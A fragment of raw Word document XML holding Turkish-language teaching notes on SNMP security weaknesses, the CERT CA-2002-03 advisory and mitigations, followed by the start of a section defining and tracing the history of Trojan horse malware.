          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enterpriseSpeci enterprise c</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuzağı oluşturulur. Bu, uygulamaya bağlıdır ve izleme istasyonuna geri gönderilen mesajdaki özel tuzak bilgilerini içer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Güvenlik Sorunları</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nin önceki kısa tanıtımı, güvenlik uzmanı için birkaç sorun yaratmalıdır. Belirtildiği gibi, varsayılan SNMP topluluk dizeleri salt okunur erişim için genel ve okuma yazma için özeldir. Çoğu sistem ve ağ yöneticisi bu değerleri değiştirmez. Sonuç olarak, yetkili olan veya olmayan herhangi bir kullanıcı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4803775" cy="2675255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="Resim 54"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kran Alıntısı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3775" cy="2675255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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cihazla ilgili SNMP yoluyla bilgi almak ve potansiyel olarak değerleri değiştirmek veya sıfırlamak. Örneğin, okuma yazma topluluk dizesi varsayılan ise, herhangi bir kullanıcı cihazın IP adresini değiştirip ağdan çıkara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nun, özellikle cihazın kullanılabilirliğini çevreleyen önemli sonuçları olabilir. Kurumsal bilgilere veya sistem şifrelerine erişmek veya SNMP kullanarak komut satırı veya terminal erişimi elde etmek tipik olarak mümkün değildir. Sonuç olarak, herhangi bir değişiklik, izleme istasyonunun cihazı kullanılamaz olarak tanımlamasına ve hizmetin geri yüklenmesine yönelik düzeltici eylemin yapılmasına neden ola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ncak, yaygın SNMP güvenlik sorunları şunları içerir:</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İyi bilinen varsayılan topluluk dizeler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aracısının çalıştığı sistemdeki yapılandırma bilgilerini değiştirebilme</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Aynı cihazı yöneten birden fazla yönetim istasyon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Hizmet reddi saldırıları</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ek çok güvenlik ve ağ uzmanı, şüphesiz Şubat 2002'de yayınlanan Bilgisayar Acil Durum Müdahale Ekibi (CERT) CA-2002-03 Tavsiye Belgesine aşinadır. Bu, bugün ağ ve güvenlik toplulukları için özellikle ilgi çekici olsa da, söz konusu diğer sorunları gölgelememelidir. Yukarıda çünkü CA-2002-03'teki sorunların birçoğu diğer güvenlik sorunlarından dolayı mümkün ola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F033BA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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İyi bilinen varsayılan topluluk dizeleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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t>Daha önce belirtildiği gibi, sırasıyla genel ve özel topluluk topluluk dizelerini kullanan salt okunur ve salt okunur iki SNMP erişim ilkesi vardır. Birçok kuruluş varsayılan topluluk dizelerini değiştirmez. Varsayılan değerlerin değiştirilmemesi, yetkisiz bir kişinin cihazla ilgili yapılandırma parametrelerini değiştirmesinin mümkün olduğu anlamına ge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onuç olarak, SNMP topluluk dizeleri parola olarak değerlendirilmelidir. Parolanın kalitesi ne kadar yüksek olursa, yetkisiz bir kişi topluluk dizesini tahmin edebilir ve yapılandırmayı değiştire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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SNMP aracısının çalıştığı sistemdeki yapılandırma bilgilerini değiştirebilme</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>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çok sistemde, yönetici ayrıcalıklarına sahip kullanıcılar, yetkisi olmasa bile, sistemlerinin yapılandırmasını değiştirebilirler. Yerel SNMP ajanı konfigürasyonunu </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>değiştirme yeteneği sistemin çalışmasını etkileyebilir, ağ yönetimi sorunlarına neden olabilir veya cihazın çalışmasını etkileyeb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onuç olarak, SNMP konfigürasyon dosyaları kontrol edilmeli ve mümkünse, konfigürasyon değişikliklerini tanımlamak ve düzeltmek için merkezi olarak yönetilmelidir. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tripwire</w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gibi araçlar da dahil olmak üzere çeşitli şekillerde yapılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F033BA"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11.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F033BA">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aynı cihazı yöneten birden fazla yönetim istasyonu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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kendi başına bir güvenlik sorunu olmasa da, aynı cihazı seçen çok sayıda yönetim istasyonu, düşük performanstan, farklı SNMP yapılandırma bilgilerine, görünür hizmet kaybına kadar değişen sorunlara neden olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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ğınız birden fazla yönetim istasyonu gerektirecek kadar büyükse, bu olayların gerçekleşmesini önlemek için ayrı topluluklar kurulmalıdır. Unutmayın, ağda kullanılabilecek SNMP topluluklarının sayısı konusunda herhangi bir kısıtlama yoktur; sadece sınırları uygulayan şebeke mühendisi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spacing w:after="0" w:line="240" w:lineRule="auto"/>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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hizmet reddi saldırıları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Hizmet reddi, yetkili veya yetkisiz yapılandırmalar nedeniyle hizmet kullanılabilirliği kaybı olarak tanımlanır. Yetkili ve yetkisiz değişiklikler konusunda net olmak önemlidir. Yapılandırmasını değiştiren, işinin bir parçası olan ve hizmet kaybına neden olan sistem veya uygulama yöneticisi, uzaktan hizmet kaybına neden olan bir program yürüten saldırganla aynı etkiye sahipt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ile ilgili önemli bir problem, servis kesintisine neden olan sistemin konfigürasyonunu değiştirme veya SNMP konfigürasyonunu değiştirme ve izleme istasyonu tarafından bildirildiği şekilde servis reddi taklit etme yeteneğidir. Her iki durumda da, nedenden bağımsız olarak, yapılandırma sorununu gözden geçirmek ve muhtemelen düzeltmek zorundadır. Yetkili bir kişi değişikliği yapsa bile, bunun şirkete maliyeti vardır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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3. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CERT CA-2002-03'ün Etkisi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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oğu ekipman üreticisi, işletmesi ve bireyi, Carnegie Mellon Yazılım Mühendisliği Enstitüsü (CM-SEI) Bilgisayar Acil Müdahale Ekibi Koordinasyon Merkezi (CERT-CC) tarafından yayınlanan CERT danışmanlığının etkisini hissetti. Danışma, Oulu Üniversitesi Güvenli Programlama Grubu, SNMP Sürüm 1'in mesaj işleme yeteneklerinin çok kapsamlı bir analizini yaptıktan sonra yayınlanmıştır. Danışma, SNMP Sürüm 1 için özel olarak belirtilmiş olsa da, çoğu SNMP uygulamaları, PDU’nun kodunu çözmek için aynı program kodunu kullanır. potansiyel olarak tüm SNMP sürümlerini etkilemekted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anışmada SNMP'yi etkilediği için belirtilen başlıca konular, yetkisiz ayrıcalıklı erişim, hizmet reddi saldırıları veya diğer dengesiz davranış potansiyelini içerir. Özellikle, Oulu Üniversitesi tarafından yapılan çalışma, SNMP yönetim istasyonu tarafından alınan tuzak mesajlarının çözülmesi ya da ağ cihazındaki SNMP aracısının aldığı taleplerin çözülmesiyle ilgili problemler buldu.</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yrıca, SNMP uygulamasında bulunan güvenlik açıklarının bazılarının doğru topluluk dizesini gerektirmediği tespit edilmiştir. Sonuç olarak, satıcılar SNMP uygulamaları için yamalar yayınlamaktadır; ancak daha önemlisi, işletmeler ağlarındaki güvenlik açıklarını test ediyor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On yıllardır kullanılmakta olan kodlardaki güvenlik açıkları, güvenlik açıklarını gidermek, doğrulamak ve düzeltme eklerini kaldırmak için geliştiricilere milyonlarca dolara mal olacak. Bu ürünlerin kullanıcıları, potansiyel riskleri sınırlamak için diğer kontrolleri yamalamak ve uygulamak için milyonlarca dolar harcar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CERT tarafından sorunu gidermek için verilen önerilerin çoğu, SNMP kullanırken ortak güvenlik sorunlarına yönelik çözümlerdir. SNMP bir ağ servisi olarak değerlendirilmeli, çünkü CERT tarafından sağlanan tavsiyeler sağduyulu sayılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• SNMP'yi devre dışı bırakın. Söz konusu cihaz SNMP kullanılarak izlenmiyorsa, servisi devre dışı bırakmak muhtemelen güvenlidir. Unutmayın, cihazı izliyor ve yanlışlıkla SNMP'yi devre dışı bırakırsanız, yönetim istasyonunuz cihazı aşağı olarak bildir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Çevre ağı filtreleme uygulayın. Çoğu işletme, yetkisiz kişilerin veya kuruluşların ağ cihazlarınızla ilgili SNMP bilgilerini almalarını engellemek için harici ağlardan gelen SNMP taleplerini doldurmalıdır. İşletmenize nasıl saldırılacağına dair iyi bir görüş sağlamak için SNMP verilerinde yeterli bilgi bulunmaktadır. İkincisi, SNMP isteklerinin ağınızdan ayrılmasını ve başka bir işletmeye yönlendirilmesini önlemek için giden filtreleme uygulanmalıdır. Buradaki istisnalar, sizin dışınızdaki başka bir ağı izliyorsanız veya bir dış kuruluş ağınız için SNMP tabanlı izleme sistemleri sağlıyorsa.</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Yetkili SNMP ana bilgisayar filtresini uygulayın. İsteyen her kullanıcı, SNMP sorgularını ağ cihazlarına gönderemez. Sonuç olarak, SNMP taleplerinin kaynak ve hedef adreslerini sınırlandırmak için yönlendiriciler ve anahtarlar gibi ağ cihazlarına filtreler takılabilir. Ek olarak, acentenin SNMP yapılandırması, yetkili SNMP yönetimini ve tuzak istasyonlarını sınırlandırmak için uygun detayları içermeli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Varsayılan topluluk dizelerini değiştirin. Çoğu işletmede büyük bir sorun olan, varsayılan kamu ve özel topluluk dizeleri karmaşık bir dizeyle değiştirilmelidir ve bu ipin bilgisi mümkün olduğu kadar az insanla sınırlı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Ayrı bir yönetim ağı oluşturun. Bu, birçok işletmenin üstlenemediği uzun, ilgili ve pahalı bir işlem olabilir. Ayrı bir yönetim ağı, ağ kısmında bir arıza olsa bile ağ cihazlarına bağlantıyı sürdürür. Bununla birlikte, tamamen ayrı bir altyapıya ihtiyaç duyar, bu da uygulanması pahalı hale getirir ve geriye doğru zorlaştırır. Yeni bir ağ oluşturuyorsanız veya kritik operasyonel gereksinimleri olan mevcut bir ağınız varsa, ayrı bir yönetim ağı şiddetle tavsiye edili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rada tanımlanan öneriler, tüm ağ cihazlarında en son yamalara sahip olsa bile, birçok işletme tarafından uygulanmalıdır. Bu tekniklerin SNMP'ye ek olarak diğer ağ protokolleri ve hizmetleri için uygulanması, yetkisiz ağ erişimi ve veri kaybı riskini büyük ölçüde azaltabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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4. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ÖZET</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nin amacı yapılandırmayı değiştirmek ve sistemlerin ve ağ cihazlarının durumunu ve kullanılabilirliğini izlemek için basit ama güçlü bir mekanizma sağlamaktır. Ancak, diğer ağ protokollerinde olduğu gibi SNMP'nin doğası da ağ yöneticileri, sistem yöneticileri ve güvenlik personeli tarafından saldırıya ve uygunsuz kullanıma maruz kalmasını sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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nin temellerini ve burada açıklandığı şekilde kullanımını etkileyen ana güvenlik konularını anlamak, güvenlik yöneticisinin ağ tasarımı ve uygulamasıyla ilgili endişeleri ağ yöneticisi veya ağ mühendisiyle iletmesine yardımcı olur.</w:t>
      </w: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708"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="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15. TRUVA ATI</w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TROJAN)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Truva atı (veya “Trojan”), gerçek amacını gizlemek için çeşitli yöntemler kullanan zararlı yazılımları açıklayan geniş bir terimdir. Bununla birlikte, bir virüsün aksine, tek başına çoğalamaz veya dosyaları enfekte edemez. Bu zararlı yazılım mağdurun cihazına sızmak için indirme, güvenlik açıklarından yararlanma, diğer zararlı kodlar ya da sosyal mühendislik teknikleri gibi yöntemleri kullanır.</w:t>
      </w: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5.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Dijital) Truva atı nedir?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00040B1D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Eski Greko-Romen hikayelerinden bilinen Truva Atı'na benzer şekilde, bu tür kötü niyetli yazılımlar, gerçek amaçlarını saklamak için gizleme veya yanlış yönlendirme metodları kullanır. Hedeflenen makineye ulaştıktan sonra, genellikle kullanıcı tarafından veya etkilenen sistemdeki diğer yazılımlar tarafından yürütülecek çeşitli teknikler kullanılır. </w:t>
      </w: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ları şu anda en sık rastlanan zararlı yazılım kategorisidir. Arka kapılar açmak, etkilenen cihazın kontrolünü ele geçirmek, kullanıcı verilerini süzmek ve saldırgana göndermek, etkilenen sisteme diğer zararlı yazılımları indirmek ve çalıştırmak ve diğer birçok kötü amaç için kullanılırlar. </w:t>
      </w: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 xml:space="preserve">15.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kısa Tarih</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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ı” terimi, Yunanlılar tarafından Truva </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kentinin fethedilme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sini anlatan klasik antik dönem </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tarihinden türetilmiştir. Yunanlılar, Truva şehrinin savunmasını ele geçirmek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">için, masif bir tahta at yaptılar ve en iyi askerlerini içine gizlediler. Truva muhafızlarını bu “armağan” ile kandırıp atı şehrin içine çektikten sonra içerideki askerler gece olmasını beklediler ve sonrasında </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>şaşkınlık içinde kalan şehrin savunmasını yenmeleri zor olmadı. Bu terim ilk kez </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="00040B1D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>1974 ABD Hava Kuvvetleri raporunda</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> zararlı kodları tanımlamak için kullanıldı. Bilgisayar sistemlerinde güvenlik açıklarının analizi üzerinde duruldu. Ancak, terim 1980'lerde, özellikle de </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="00040B1D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Ken</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidRPr="00040B1D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r w:rsidRPr="00040B1D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Thompson'ın</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> dersi </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r w:rsidRPr="00040B1D">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>sonrasında</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACM Turing Ödülleri 1983 resepsiyonunda popüler oldu.</w:t>
      </w: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 xml:space="preserve">15.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>İyi Bilinen Örnekler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Yaygın olarak bilinen ilk Truva atlarından biri de fidye yazılımıydı: </w:t>
      </w:r>
